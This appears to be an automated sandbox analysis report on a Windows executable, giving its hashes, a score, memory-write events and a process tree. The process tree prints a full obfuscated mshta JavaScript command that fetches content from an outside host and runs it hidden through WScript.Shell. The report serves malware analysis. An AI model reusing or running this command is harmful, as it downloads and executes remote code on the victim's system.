bf44cfa6534d38b172ea611502230f1978f26a28cb1b510ed1c2cd6bd15f007f

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
24/12/2023, 21:52

Target

13e7feb9430554945b5aa4f6b5524d66.exe
Size

3KB
MD5

13e7feb9430554945b5aa4f6b5524d66
SHA1

3d644cfe881c9c5e80f94f0173dc3fa3169e145b
SHA256

bf44cfa6534d38b172ea611502230f1978f26a28cb1b510ed1c2cd6bd15f007f
SHA512

271912df0b8a74a9081a1c3457ac4290c19cd88ade2d42a48683d187aea9391c3fa6505154dcfa15358c3ca273c2203548c3d579dad0b4d063fd91d72bf4cc08

Score

1^/10

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1868 wrote to memory of 2368	1868	13e7feb9430554945b5aa4f6b5524d66.exe	16
PID 1868 wrote to memory of 2368	1868	13e7feb9430554945b5aa4f6b5524d66.exe	16
PID 1868 wrote to memory of 2368	1868	13e7feb9430554945b5aa4f6b5524d66.exe	16
PID 1868 wrote to memory of 2368	1868	13e7feb9430554945b5aa4f6b5524d66.exe	16

C:\Windows\SysWOW64\mshta.exe
mshta "javascript:document.write();51;y=unescape('%325%33%7E%68t%74p%3A%2F%2Fa%73u%305%2Ef%75n%2Fh%72i%2F%3F%32f%652%652%62%7E%317%39').split('~');205;try{x='WinHttp';82;x=new ActiveXObject(x+'.'+x+'Request.5.1');175;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);222;x.send();105;y='ipt.S';173;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);253;}catch(e){};202;;window.close();"
1⤵
PID:2368

C:\Users\Admin\AppData\Local\Temp\13e7feb9430554945b5aa4f6b5524d66.exe
"C:\Users\Admin\AppData\Local\Temp\13e7feb9430554945b5aa4f6b5524d66.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1868